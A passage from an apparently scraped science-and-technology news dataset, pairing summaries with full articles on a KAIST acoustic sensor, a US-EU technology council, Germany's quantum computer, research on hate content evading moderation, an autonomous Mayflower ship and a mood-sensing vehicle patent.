sensor with abundant voice information is the best fit for this application. Currently, the mass production process is on the verge of completion, so we hope that this will be used in our daily lives very soon." Professor Lee also established a startup company called Fronics Inc., located both in Korea and U.S. (branch office) to commercialize this flexible acoustic sensor and is seeking collaborations with global AI companies. These research results entitled "Biomimetic and Flexible Piezoelectric Mobile Acoustic Sensors with Multi-Resonant Ultrathin Structures for Machine Learning Biometrics" were published in Science Advances in 2021 (7, eabe5683). < Figure: (a) Schematic illustration of the basilar membrane-inspired flexible piezoelectric mobile acoustic sensor (b) Real-time voice biometrics based on machine learning algorithms (c) The world's first commercial production of a mobile-sized acoustic sensor. > -Publication "Biomimetic and flexible piezoelectric mobile acoustic sensors with multiresonant ultrathin structures for machine learning biometrics," Science Advances (DOI: 10.1126/sciadv.abe5683) -Profile Professor Keon Jae Lee Department of Materials Science and Engineering Flexible and Nanobio Device Lab http://fand.kaist.ac.kr/ KAIST
Researchers at South Korea's Korea Advanced Institute of Science and Technology (KAIST) have developed a bioinspired flexible piezoelectric acoustic sensor with a multi-resonant ultrathin piezoelectric membrane that acts like the basilar membrane of the human cochlea to achieve accurate and far-distant voice detection. The miniaturized sensor can be embedded into smartphones and artificial intelligence speakers for machine learning-based biometric authentication and voice processing. Compared to a MEMS condenser microphone, the researchers found the speaker identification error rate for their resonant mobile acoustic sensor was 56% lower after it experienced 150 training datasets, and 75% lower after 2,800 training datasets.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at South Korea's Korea Advanced Institute of Science and Technology (KAIST) have developed a bioinspired flexible piezoelectric acoustic sensor with a multi-resonant ultrathin piezoelectric membrane that acts like the basilar membrane of the human cochlea to achieve accurate and far-distant voice detection. The miniaturized sensor can be embedded into smartphones and artificial intelligence speakers for machine learning-based biometric authentication and voice processing. Compared to a MEMS condenser microphone, the researchers found the speaker identification error rate for their resonant mobile acoustic sensor was 56% lower after it experienced 150 training datasets, and 75% lower after 2,800 training datasets. A KAIST research team led by Professor Keon Jae Lee from the Department of Materials Science and Engineering has developed a bioinspired flexible piezoelectric acoustic sensor with multi-resonant ultrathin piezoelectric membrane mimicking the basilar membrane of the human cochlea. The flexible acoustic sensor has been miniaturized for embedding into smartphones and the first commercial prototype is ready for accurate and far-distant voice detection. In 2018, P rofessor Lee presented the first concept of a flexible piezoelectric acoustic senso r , inspired by the fact that humans can accurately detect far-distant voices using a multi-resonant trapezoidal membrane with 20,000 hair cells. However, previous acoustic sensors could not be integrated into commercial products like smartphones and AI speakers due to their large device size. In this work, the research team fabricated a mobile-sized acoustic sensor by adopting ultrathin piezoelectric membranes with high sensitivity. Simulation studies proved that the ultrathin polymer underneath inorganic piezoelectric thin film can broaden the resonant bandwidth to cover the entire voice frequency range using seven channels. Based on this theory, the research team successfully demonstrated the miniaturized acoustic sensor mounted in commercial smartphones and AI speakers for machine learning-based biometric authentication and voice processing. (Please refer to the explanatory movie KAIST Flexible Piezoelectric Mobile Acoustic Sensor ). The resonant mobile acoustic sensor has superior sensitivity and multi-channel signals compared to conventional condenser microphones with a single channel, and it has shown highly accurate and far-distant speaker identification with a small amount of voice training data. The error rate of speaker identification was significantly reduced by 56% (with 150 training datasets) and 75% (with 2,800 training datasets) compared to that of a MEMS condenser device. Professor Lee said, "Recently, Google has been targeting the 'Wolverine Project' on far-distant voice separation from multi-users for next-generation AI user interfaces. I expect that our multi-channel resonant acoustic sensor with abundant voice information is the best fit for this application. Currently, the mass production process is on the verge of completion, so we hope that this will be used in our daily lives very soon." Professor Lee also established a startup company called Fronics Inc., located both in Korea and U.S. (branch office) to commercialize this flexible acoustic sensor and is seeking collaborations with global AI companies. These research results entitled "Biomimetic and Flexible Piezoelectric Mobile Acoustic Sensors with Multi-Resonant Ultrathin Structures for Machine Learning Biometrics" were published in Science Advances in 2021 (7, eabe5683). < Figure: (a) Schematic illustration of the basilar membrane-inspired flexible piezoelectric mobile acoustic sensor (b) Real-time voice biometrics based on machine learning algorithms (c) The world's first commercial production of a mobile-sized acoustic sensor. > -Publication "Biomimetic and flexible piezoelectric mobile acoustic sensors with multiresonant ultrathin structures for machine learning biometrics," Science Advances (DOI: 10.1126/sciadv.abe5683) -Profile Professor Keon Jae Lee Department of Materials Science and Engineering Flexible and Nanobio Device Lab http://fand.kaist.ac.kr/ KAIST
236
U.S., EU Establish Trade, Technology Council to Compete with China
The United States and the European Union (EU) on Tuesday formally established a Trade and Technology Council (TTC) to coordinate on critical technology issues such as developing semiconductors, researching emerging fields and securing supply chains. The TTC was established as part of the U.S.-EU summit held Tuesday in Brussels and is intended to serve as a vehicle to compete with China on emerging technology issues. The nations committed in the official summit statement to driving "digital transformation that spurs trade and investment, strengthens our technological and industrial leadership, boosts innovation, and protects and promotes critical and emerging technologies and infrastructure." "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations," the statement read. The coalition noted that the TTC was meant to "kick-start" its agenda on trade and technology issues, with goals such as increasing international cooperation on technology supply chains, strengthening research partnerships and coordinating on standards development. "The notion here is that the United States and Europe laid the foundation for the world economy after World War II and now have to work together to write the rules of the road for the next generation, particularly in the areas of economics and emerging technologies," a senior administration official told reporters Monday ahead of the summit. One issue the TTC will address is the semiconductor shortage, which has had a major negative impact on industries such as the automobile sector, with semiconductors used in everything from cars to mobile devices. " Notably, we commit to building a U.S.-EU partnership on the rebalancing of global supply chains in semiconductors with a view to enhancing U.S. and EU respective security of supply as well as capacity to design and produce the most powerful and resource efficient semiconductors," the statement read. The TTC will also address issues such as setting standards for artificial intelligence and internet-connected technologies, on promoting green technologies, on securing critical telecommunications systems, and on what the U.S. and the EU described as a "misuse of technology threatening security and human rights." According to the senior administration official, the TTC will be co-chaired by Secretary of State Antony Blinken Antony Blinken Has Biden's Afghanistan debacle sown the seeds of another 9/11? Biden administration announces M in humanitarian aid for Ukraine Almost 24,000 Afghans have entered US since Kabul airlift began MORE , Commerce Secretary Gina Raimondo Gina Raimondo White House rallies private industry in cyber battle Major tech groups commit to array of cybersecurity actions following White House meeting White House gathers tech, education, banking leaders for cyber meeting MORE and U.S. Trade Representative Katherine Tai Katherine Tai Asian American leaders eager to talk voting rights with Biden Biden's trade agenda is off to a rocky start Pence v. Biden on China: Competing but consistent visions MORE . In addition to the TTC, the U.S.-EU summit also formally established a Joint Technology Competition Policy Dialogue to zero in on more cooperation in the tech sector on issues such as biotechnology and genomics. The group will also work to boost cybersecurity threat information sharing between the U.S. and the EU following a wave of cyberattacks. "I think we have a lot to deal with, from COVID-19 to whether or not we're in a position that we can generate the kind of strengthening in transatlantic trade and technological cooperation," President Biden said at the summit's plenary session on Tuesday. The senior administration official stressed to reporters the importance of the new groups in competing with China, noting that the country poses a "significant challenge" in the realms of trade and technology. "Dealing with China's nonmarket practices, its economic abuses and, of course, its efforts to shape the rules of the road on technology for the 21st century will be an important part of the work of this council," the official said. The U.S.-EU summit came on the heels of a meeting of the Group of Seven nations and of NATO, during which concerns about competition with China were discussed. China on Tuesday rebuked NATO for its critique, accusing it of having a "Cold War mentality."
A Trade and Technology Council (TTC) established by the U.S. and the EU this week will help to coordinate on critical technology issues and support their competition with China. An official statement from a U.S.-EU summit in Brussels read, "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations." Among other things, the TTC will address the semiconductor shortage, the creation of standards for artificial intelligence and Internet-connected technologies, and the securing of critical telecommunications systems. Also established at the summit was a Joint Technology Competition Policy Dialogue to foster cooperation on issues like biotechnology and genomics, and to increase U.S.-EU sharing of information on cybersecurity threats.
[]
[]
[]
scitechnews
None
None
None
None
A Trade and Technology Council (TTC) established by the U.S. and the EU this week will help to coordinate on critical technology issues and support their competition with China. An official statement from a U.S.-EU summit in Brussels read, "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations." Among other things, the TTC will address the semiconductor shortage, the creation of standards for artificial intelligence and Internet-connected technologies, and the securing of critical telecommunications systems. Also established at the summit was a Joint Technology Competition Policy Dialogue to foster cooperation on issues like biotechnology and genomics, and to increase U.S.-EU sharing of information on cybersecurity threats. The United States and the European Union (EU) on Tuesday formally established a Trade and Technology Council (TTC) to coordinate on critical technology issues such as developing semiconductors, researching emerging fields and securing supply chains. The TTC was established as part of the U.S.-EU summit held Tuesday in Brussels and is intended to serve as a vehicle to compete with China on emerging technology issues. The nations committed in the official summit statement to driving "digital transformation that spurs trade and investment, strengthens our technological and industrial leadership, boosts innovation, and protects and promotes critical and emerging technologies and infrastructure." "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations," the statement read. The coalition noted that the TTC was meant to "kick-start" its agenda on trade and technology issues, with goals such as increasing international cooperation on technology supply chains, strengthening research partnerships and coordinating on standards development. "The notion here is that the United States and Europe laid the foundation for the world economy after World War II and now have to work together to write the rules of the road for the next generation, particularly in the areas of economics and emerging technologies," a senior administration official told reporters Monday ahead of the summit. One issue the TTC will address is the semiconductor shortage, which has had a major negative impact on industries such as the automobile sector, with semiconductors used in everything from cars to mobile devices. " Notably, we commit to building a U.S.-EU partnership on the rebalancing of global supply chains in semiconductors with a view to enhancing U.S. and EU respective security of supply as well as capacity to design and produce the most powerful and resource efficient semiconductors," the statement read. The TTC will also address issues such as setting standards for artificial intelligence and internet-connected technologies, on promoting green technologies, on securing critical telecommunications systems, and on what the U.S. and the EU described as a "misuse of technology threatening security and human rights." According to the senior administration official, the TTC will be co-chaired by Secretary of State Antony Blinken Antony Blinken Has Biden's Afghanistan debacle sown the seeds of another 9/11? Biden administration announces M in humanitarian aid for Ukraine Almost 24,000 Afghans have entered US since Kabul airlift began MORE , Commerce Secretary Gina Raimondo Gina Raimondo White House rallies private industry in cyber battle Major tech groups commit to array of cybersecurity actions following White House meeting White House gathers tech, education, banking leaders for cyber meeting MORE and U.S. Trade Representative Katherine Tai Katherine Tai Asian American leaders eager to talk voting rights with Biden Biden's trade agenda is off to a rocky start Pence v. Biden on China: Competing but consistent visions MORE . In addition to the TTC, the U.S.-EU summit also formally established a Joint Technology Competition Policy Dialogue to zero in on more cooperation in the tech sector on issues such as biotechnology and genomics. The group will also work to boost cybersecurity threat information sharing between the U.S. and the EU following a wave of cyberattacks. "I think we have a lot to deal with, from COVID-19 to whether or not we're in a position that we can generate the kind of strengthening in transatlantic trade and technological cooperation," President Biden said at the summit's plenary session on Tuesday. The senior administration official stressed to reporters the importance of the new groups in competing with China, noting that the country poses a "significant challenge" in the realms of trade and technology. "Dealing with China's nonmarket practices, its economic abuses and, of course, its efforts to shape the rules of the road on technology for the 21st century will be an important part of the work of this council," the official said. The U.S.-EU summit came on the heels of a meeting of the Group of Seven nations and of NATO, during which concerns about competition with China were discussed. China on Tuesday rebuked NATO for its critique, accusing it of having a "Cold War mentality."
237
Germany Unveils Quantum Computer to Keep Europe in Global Tech Race
Angela Merkel on Tuesday inaugurated a computer that uses subatomic particles to make millions of calculations in microseconds, making Germany a contender in the global race to develop the next-generation technology called quantum computing. "As far as research into quantum technologies is concerned, Germany is among the best of the world, and we intend to remain amongst the best of the world," the German chancellor - herself a quantum chemist - said during a launch event for the device. "We're in the midst of a very intense competition, and Germany has the intention to have an important say." Europe, the United States and China are locked in competition over who can build and exploit the most powerful computers. Quantum technology, while still in its infancy, promises to carry out previously impossible calculations at record speed. Germany hopes that quantum computing will spur innovation across industry - from transport and the environment to health. While traditional computers process "bits" of information that have the value 1 or 0, known as a binary code, quantum computers are able to process bits that can be 1 and 0 simultaneously, mirroring subatomic particle behavior. These quantum bits, also known as qubits, can run calculations much, much faster. Policymakers hope the tech will bring an economic windfall when applied to the economy. Self-driving cars, for example, could learn to drive more safely, and faster. The tech also promises to be able to crack sophisticated encryption. Benefits of quantum research accrue to countries that can host and use devices. Germany's computer, located near Stuttgart, is being built by U.S. tech company IBM and will be managed by Fraunhofer-Gesellschaft , Europe's leading organization for applied research. Researchers and companies will be able to develop and test their quantum algorithms and gather expertise by using the computer. Merkel's interest in the tech underscores the stakes for Germany and other European countries who are trying to build up a local tech sector and wean themselves off foreign providers. Though IBM's participation in the program highlights that even Germany isn't there yet. With few leading European quantum companies, IBM's providing both the computer itself, and the cloud it's connected to. Last year, Berlin announced a €2 billion investment in quantum over five years, and it can also tap into European Commission's €1 billion fund for quantum technologies. Still, Merkel acknowledged that Europe's behind and needed to catch up. "Quantum computing can play a ... key role in our endeavour to acquire technological and digital sovereignty," the chancellor said. "Of course we're not the only ones to realize that this is the case. The United States and China been fully invested enormous amounts of money." The U.S. and China currently hold the most patents on quantum computers and technology. The Chinese government reportedly spends at least $2.5 billion a year on quantum research. In 2018, Washington earmarked $1.2 billion for quantum research as part of its National Quantum Initiative Act . The federal government topped up the funding with other initiatives including $237 million in the 2021 budget. Both countries can also count on their tech giants including Alibaba, IBM and Microsoft. Amid tense discussions in Europe over who controls industrial data, Fraunhofer-Gesellschaft, the research institute, will store and process the data produced by the computer IBM's data centers in Germany. "Orders will be sent to the quantum computer and can be further processed in traditional computers for data privacy and sovereignty, the quantum computer will be operated under German law," said Reimund Neugebauer, president of Fraunhofer-Gesellschaft at the launch. He said the institute has already concluded partnerships with companies and universities that will use the computer, but did not name them. Germany's minister for research Anja Karliczek said: "Building up this ecosystem is a very important question for security and sovereignty." "We also want to develop the hardware for quantum computing here in Germany, and I would like to emphasise that sovereignty doesn't mean we should isolate ourselves."
Germany unveiled a quantum computer this week. Under construction by IBM, the device will be managed by German research organization Fraunhofer-Gesellschaft, for use by researchers and companies developing and testing quantum algorithms. Germany announced last year a €2-billion (U.S.$2.37-billion) investment in quantum over the ensuing five years, supplemented by the European Commission's €1-billion (U.S.$1.19-billion) fund for quantum technologies. Chancellor Angela Merkel indicated that it is time for Europe to catch up to the U.S. and China, which hold the greatest number of patents related to quantum computing. Fraunhofer-Gesellschaft's Reimund Neugebauer said partnerships have been forged with companies and universities to use the computer, although he declined to name them.
[]
[]
[]
scitechnews
None
None
None
None
Germany unveiled a quantum computer this week. Under construction by IBM, the device will be managed by German research organization Fraunhofer-Gesellschaft, for use by researchers and companies developing and testing quantum algorithms. Germany announced last year a €2-billion (U.S.$2.37-billion) investment in quantum over the ensuing five years, supplemented by the European Commission's €1-billion (U.S.$1.19-billion) fund for quantum technologies. Chancellor Angela Merkel indicated that it is time for Europe to catch up to the U.S. and China, which hold the greatest number of patents related to quantum computing. Fraunhofer-Gesellschaft's Reimund Neugebauer said partnerships have been forged with companies and universities to use the computer, although he declined to name them. Angela Merkel on Tuesday inaugurated a computer that uses subatomic particles to make millions of calculations in microseconds, making Germany a contender in the global race to develop the next-generation technology called quantum computing. "As far as research into quantum technologies is concerned, Germany is among the best of the world, and we intend to remain amongst the best of the world," the German chancellor - herself a quantum chemist - said during a launch event for the device. "We're in the midst of a very intense competition, and Germany has the intention to have an important say." Europe, the United States and China are locked in competition over who can build and exploit the most powerful computers. Quantum technology, while still in its infancy, promises to carry out previously impossible calculations at record speed. Germany hopes that quantum computing will spur innovation across industry - from transport and the environment to health. While traditional computers process "bits" of information that have the value 1 or 0, known as a binary code, quantum computers are able to process bits that can be 1 and 0 simultaneously, mirroring subatomic particle behavior. These quantum bits, also known as qubits, can run calculations much, much faster. Policymakers hope the tech will bring an economic windfall when applied to the economy. Self-driving cars, for example, could learn to drive more safely, and faster. The tech also promises to be able to crack sophisticated encryption. Benefits of quantum research accrue to countries that can host and use devices. Germany's computer, located near Stuttgart, is being built by U.S. tech company IBM and will be managed by Fraunhofer-Gesellschaft , Europe's leading organization for applied research. Researchers and companies will be able to develop and test their quantum algorithms and gather expertise by using the computer. Merkel's interest in the tech underscores the stakes for Germany and other European countries who are trying to build up a local tech sector and wean themselves off foreign providers. Though IBM's participation in the program highlights that even Germany isn't there yet. With few leading European quantum companies, IBM's providing both the computer itself, and the cloud it's connected to. Last year, Berlin announced a €2 billion investment in quantum over five years, and it can also tap into European Commission's €1 billion fund for quantum technologies. Still, Merkel acknowledged that Europe's behind and needed to catch up. "Quantum computing can play a ... key role in our endeavour to acquire technological and digital sovereignty," the chancellor said. "Of course we're not the only ones to realize that this is the case. The United States and China been fully invested enormous amounts of money." The U.S. and China currently hold the most patents on quantum computers and technology. The Chinese government reportedly spends at least $2.5 billion a year on quantum research. In 2018, Washington earmarked $1.2 billion for quantum research as part of its National Quantum Initiative Act . The federal government topped up the funding with other initiatives including $237 million in the 2021 budget. Both countries can also count on their tech giants including Alibaba, IBM and Microsoft. Amid tense discussions in Europe over who controls industrial data, Fraunhofer-Gesellschaft, the research institute, will store and process the data produced by the computer IBM's data centers in Germany. "Orders will be sent to the quantum computer and can be further processed in traditional computers for data privacy and sovereignty, the quantum computer will be operated under German law," said Reimund Neugebauer, president of Fraunhofer-Gesellschaft at the launch. He said the institute has already concluded partnerships with companies and universities that will use the computer, but did not name them. Germany's minister for research Anja Karliczek said: "Building up this ecosystem is a very important question for security and sovereignty." "We also want to develop the hardware for quantum computing here in Germany, and I would like to emphasise that sovereignty doesn't mean we should isolate ourselves."
238
Malicious Content Exploits Pathways Between Platforms to Thrive Online, Subvert Moderation
Malicious COVID-19 online content - including racist messages, disinformation and misinformation - thrives and spreads online by bypassing the moderation efforts of individual social media platforms, according to a new research study led by George Washington University Professor of Physics Neil Johnson and published in the journal Scientific Reports . By mapping online hate clusters across six major social media platforms, Dr. Johnson and a team of researchers revealed how malicious content exploits pathways between platforms, highlighting the need for social media companies to rethink and adjust their content moderation policies. The research team set out to understand how and why malicious content thrives so well online despite significant moderation efforts, and how it can be stopped. They used a combination of machine learning and network data science to investigate how online hate communities wielded COVID-19 as a weapon and used current events to draw in new followers. "Until now, slowing the spread of malicious content online has been like playing a game of whack-a-mole, because a map of the online hate multiverse did not exist," said Dr. Johnson, who is also a researcher at the GW Institute for Data, Democracy & Politics . "You cannot win a battle if you don't have a map of the battlefield. In our study, we laid out a first-of-its-kind map of this battlefield. Whether you're looking at traditional hate topics, such as anti-Semitism or anti-Asian racism surrounding COVID-19, the battlefield map is the same. And it is this map of links within and between platforms that is the missing piece in understanding how we can slow or stop the spread of online hate content." The researchers began by mapping how hate clusters interconnect to spread their narratives across social media platforms. Focusing on six platforms - Facebook, VKontakte, Instagram, Gab, Telegram and 4Chan - the team started with a given hate cluster and looked outward to find a second cluster that was strongly connected to the original. They found the strongest connections were VKontakte into Telegram (40.83 percent of cross-platform connections), Telegram into 4Chan (11.09 percent) and Gab into 4Chan (10.90 percent). The researchers then turned their attention to identifying malicious content related to COVID-19. They found that the coherence of COVID-19 discussion increased rapidly in the early phases of the pandemic, with hate clusters forming narratives and cohering around COVID-19 topics and misinformation. To subvert moderation efforts by social media platforms, groups sending hate messages used several adaptation strategies in order to regroup on other platforms or reenter a platform once they are banned, the researchers found. For example, clusters frequently changed their names to avoid detection by moderators' algorithms, such as typing "vaccine" as "va$$ine." Similarly, anti-Semitic and anti-LGBTQ clusters simply add strings of 1's or A's before their name. "Because the number of independent social media platforms is growing, these hate-generating clusters are very likely to strengthen and expand their interconnections via new links and will likely exploit new platforms that lie beyond the reach of the U.S. and other Western nations' jurisdictions," Dr. Johnson said. "The chances of getting all social media platforms globally to work together to solve this are very slim. However, our mathematical analysis identifies strategies that platforms can use as a group to effectively slow or block online hate content." Based on their findings, the team, which included researchers at Google, suggested several ways for social media platforms to slow the spread of malicious content: "Our study demonstrates a similarity between the spread of online hate and the spread of a virus," said Yonatan Lupu , an associate professor of political science at GW and co-author on the study. "Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Going forward, the research team already is using their map and its mathematical modeling to analyze other forms of malicious content, including the weaponization of COVID-19 vaccine misinformation. They are also examining the extent to which single actors, including foreign governments, may play a more influential or controlling role in this space than others.
New research indicates that malicious COVID-19 content circumvents social media platforms' moderation initiatives to prosper online. George Washington University (GW) investigators combined machine learning with network data science to detail malicious content's exploitation of pathways between platforms. The team mapped the interconnection of hate clusters to spread their narratives across Facebook, VKontakte, Instagram, Gab, Telegram, and 4Chan. They found the COVID-19 discussion solidified in the early phases of the pandemic, with hate clusters subverting moderation via adaptive methods to regroup on other platforms and/or re-infiltrate a platform. GW's Yonatan Lupu said, "Our study demonstrates a similarity between the spread of online hate and the spread of a virus. Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus."
[]
[]
[]
scitechnews
None
None
None
None
New research indicates that malicious COVID-19 content circumvents social media platforms' moderation initiatives to prosper online. George Washington University (GW) investigators combined machine learning with network data science to detail malicious content's exploitation of pathways between platforms. The team mapped the interconnection of hate clusters to spread their narratives across Facebook, VKontakte, Instagram, Gab, Telegram, and 4Chan. They found the COVID-19 discussion solidified in the early phases of the pandemic, with hate clusters subverting moderation via adaptive methods to regroup on other platforms and/or re-infiltrate a platform. GW's Yonatan Lupu said, "Our study demonstrates a similarity between the spread of online hate and the spread of a virus. Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Malicious COVID-19 online content - including racist messages, disinformation and misinformation - thrives and spreads online by bypassing the moderation efforts of individual social media platforms, according to a new research study led by George Washington University Professor of Physics Neil Johnson and published in the journal Scientific Reports . By mapping online hate clusters across six major social media platforms, Dr. Johnson and a team of researchers revealed how malicious content exploits pathways between platforms, highlighting the need for social media companies to rethink and adjust their content moderation policies. The research team set out to understand how and why malicious content thrives so well online despite significant moderation efforts, and how it can be stopped. They used a combination of machine learning and network data science to investigate how online hate communities wielded COVID-19 as a weapon and used current events to draw in new followers. "Until now, slowing the spread of malicious content online has been like playing a game of whack-a-mole, because a map of the online hate multiverse did not exist," said Dr. Johnson, who is also a researcher at the GW Institute for Data, Democracy & Politics . "You cannot win a battle if you don't have a map of the battlefield. In our study, we laid out a first-of-its-kind map of this battlefield. Whether you're looking at traditional hate topics, such as anti-Semitism or anti-Asian racism surrounding COVID-19, the battlefield map is the same. And it is this map of links within and between platforms that is the missing piece in understanding how we can slow or stop the spread of online hate content." The researchers began by mapping how hate clusters interconnect to spread their narratives across social media platforms. Focusing on six platforms - Facebook, VKontakte, Instagram, Gab, Telegram and 4Chan - the team started with a given hate cluster and looked outward to find a second cluster that was strongly connected to the original. They found the strongest connections were VKontakte into Telegram (40.83 percent of cross-platform connections), Telegram into 4Chan (11.09 percent) and Gab into 4Chan (10.90 percent). The researchers then turned their attention to identifying malicious content related to COVID-19. They found that the coherence of COVID-19 discussion increased rapidly in the early phases of the pandemic, with hate clusters forming narratives and cohering around COVID-19 topics and misinformation. To subvert moderation efforts by social media platforms, groups sending hate messages used several adaptation strategies in order to regroup on other platforms or reenter a platform once they are banned, the researchers found. For example, clusters frequently changed their names to avoid detection by moderators' algorithms, such as typing "vaccine" as "va$$ine." Similarly, anti-Semitic and anti-LGBTQ clusters simply add strings of 1's or A's before their name. "Because the number of independent social media platforms is growing, these hate-generating clusters are very likely to strengthen and expand their interconnections via new links and will likely exploit new platforms that lie beyond the reach of the U.S. and other Western nations' jurisdictions," Dr. Johnson said. "The chances of getting all social media platforms globally to work together to solve this are very slim. However, our mathematical analysis identifies strategies that platforms can use as a group to effectively slow or block online hate content." Based on their findings, the team, which included researchers at Google, suggested several ways for social media platforms to slow the spread of malicious content: "Our study demonstrates a similarity between the spread of online hate and the spread of a virus," said Yonatan Lupu , an associate professor of political science at GW and co-author on the study. "Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Going forward, the research team already is using their map and its mathematical modeling to analyze other forms of malicious content, including the weaponization of COVID-19 vaccine misinformation. They are also examining the extent to which single actors, including foreign governments, may play a more influential or controlling role in this space than others.
239
Robotic Ship Sets Off to Retrace the Mayflower's Journey
SWANSEA, Wales (AP) - Four centuries and one year after the Mayflower departed from Plymouth, England, on a historic sea journey to America, another trailblazing vessel with the same name has set off to retrace the voyage. This Mayflower, though, is a sleek, modern robotic ship that is carrying no human crew or passengers. It's being piloted by sophisticated artificial intelligence technology for a trans-Atlantic crossing that could take up to three weeks, in a project aimed at revolutionizing marine research. IBM, which built the ship with nonprofit marine research organization ProMare, confirmed the Mayflower Autonomous Ship began its trip early Tuesday. Charting the path of its 1620 namesake, the Mayflower is set to land at Provincetown on Cape Cod before making its way to Plymouth, Massachusetts. If successful, it would be the largest autonomous vessel to cross the Atlantic. The new Mayflower's journey was originally scheduled for last year, part of 400th anniversary commemorations of the original ship's voyage carrying Pilgrim settlers to New England. Those commemorations were set to involve the British, Americans, Dutch - and the Wampanoag people on whose territory the settlers landed, and who had been marginalized on past anniversaries. The Mayflower project aims to usher in a new age for automated research ships. Its designers hope it will be the first in a new generation of high-tech vessels that can explore ocean regions that are too difficult or dangerous for people to go to. The 50-foot (15-meter) trimaran, propelled by a solar-powered hybrid electric motor, bristles with artificial intelligence-powered cameras and dozens of onboard sensors that will collect data on ocean acidification, microplastics and marine mammal conservation. Its launch has been delayed by the coronavirus pandemic, and more recently, bad weather throughout May, IBM spokesman Jonathan Batty said. But Batty said the delay allowed for the fitting of a unique feature on the ship: an electric "tongue" that can provide instant analysis of the ocean's chemistry, called Hypertaste. "It's a brand new piece of equipment that's never been created before," Batty said. The cutting-edge, 1 million pound ($1.3 million) ship could take up to three weeks to voyage across the North Atlantic, if forecasts for good weather hold up. The ship is also carrying mementos from people at either end of the journey, such as rocks, personal photos, and books. People can follow its journey online .
The Mayflower Autonomous Ship set off this week to retrace the journey of its 1620 namesake across the Atlantic Ocean. The robotic ship, piloted by artificial intelligence (AI) technology and carrying no human crew or passengers, will make the trans-Atlantic crossing from Plymouth, U.K., to Provincetown, MA, and then to Plymouth, MA, in three weeks or less. Built by IBM and the nonprofit marine research organization ProMare, the 50-foot trimaran is propelled by a solar-powered hybrid electric motor and will gather data as it goes on ocean acidification, microplastics, and marine mammal conservation using AI-powered cameras and onboard sensors. The $1.3-million ship's journey can be followed online at
[]
[]
[]
scitechnews
None
None
None
None
The Mayflower Autonomous Ship set off this week to retrace the journey of its 1620 namesake across the Atlantic Ocean. The robotic ship, piloted by artificial intelligence (AI) technology and carrying no human crew or passengers, will make the trans-Atlantic crossing from Plymouth, U.K., to Provincetown, MA, and then to Plymouth, MA, in three weeks or less. Built by IBM and the nonprofit marine research organization ProMare, the 50-foot trimaran is propelled by a solar-powered hybrid electric motor and will gather data as it goes on ocean acidification, microplastics, and marine mammal conservation using AI-powered cameras and onboard sensors. The $1.3-million ship's journey can be followed online at SWANSEA, Wales (AP) - Four centuries and one year after the Mayflower departed from Plymouth, England, on a historic sea journey to America, another trailblazing vessel with the same name has set off to retrace the voyage. This Mayflower, though, is a sleek, modern robotic ship that is carrying no human crew or passengers. It's being piloted by sophisticated artificial intelligence technology for a trans-Atlantic crossing that could take up to three weeks, in a project aimed at revolutionizing marine research. IBM, which built the ship with nonprofit marine research organization ProMare, confirmed the Mayflower Autonomous Ship began its trip early Tuesday. Charting the path of its 1620 namesake, the Mayflower is set to land at Provincetown on Cape Cod before making its way to Plymouth, Massachusetts. If successful, it would be the largest autonomous vessel to cross the Atlantic. The new Mayflower's journey was originally scheduled for last year, part of 400th anniversary commemorations of the original ship's voyage carrying Pilgrim settlers to New England. Those commemorations were set to involve the British, Americans, Dutch - and the Wampanoag people on whose territory the settlers landed, and who had been marginalized on past anniversaries. The Mayflower project aims to usher in a new age for automated research ships. Its designers hope it will be the first in a new generation of high-tech vessels that can explore ocean regions that are too difficult or dangerous for people to go to. The 50-foot (15-meter) trimaran, propelled by a solar-powered hybrid electric motor, bristles with artificial intelligence-powered cameras and dozens of onboard sensors that will collect data on ocean acidification, microplastics and marine mammal conservation. Its launch has been delayed by the coronavirus pandemic, and more recently, bad weather throughout May, IBM spokesman Jonathan Batty said. But Batty said the delay allowed for the fitting of a unique feature on the ship: an electric "tongue" that can provide instant analysis of the ocean's chemistry, called Hypertaste. "It's a brand new piece of equipment that's never been created before," Batty said. The cutting-edge, 1 million pound ($1.3 million) ship could take up to three weeks to voyage across the North Atlantic, if forecasts for good weather hold up. The ship is also carrying mementos from people at either end of the journey, such as rocks, personal photos, and books. People can follow its journey online .
240
Invention Uses Machine-Learned Human Emotions to 'Drive' Autonomous Vehicles
Mehrdad Nojoumian, Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. Americans have one of the highest levels of fear in the world when it comes to technology related to robotic systems and self-driving cars. Addressing these concerns is paramount if the technology hopes to move forward. A researcher from Florida Atlantic University 's College of Engineering and Computer Science has developed new technology for autonomous systems that is responsive to human emotions based on machine-learned human moods. His solution, "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," has earned a very competitive utility patent from the United States Patent and Trademark Office for FAU. Adaptive Mood Control provides a convenient, pleasant, and more importantly, trustworthy experience for humans who interact with autonomous vehicles. The technology can be used in a wide range of autonomous systems, including self-driving cars, autonomous military vehicles, autonomous airplanes or helicopters, and even social robots. "The uniqueness of this invention is that the operational modes and parameters related to perceived emotion are exchanged with adjacent vehicles for achieving objectives of the adaptive mood control module in the semi or fully autonomous vehicle in a cooperative driving context," said Mehrdad Nojoumian , Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. "Human-AI/autonomy interaction is at the center of attention by academia and industries. More specifically, trust between humans and AI/autonomous technologies plays a critical role in this domain, because it will directly affect the social acceptability of these modern technologies." The patent, titled "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," uses non-intrusive sensory solutions in semi or fully autonomous vehicles to perceive the mood of the drivers and passengers. Information is collected based on facial expressions, sensors within the handles/seats and thermal cameras among other monitoring devices. Additionally, the adaptive mood control system contains real-time 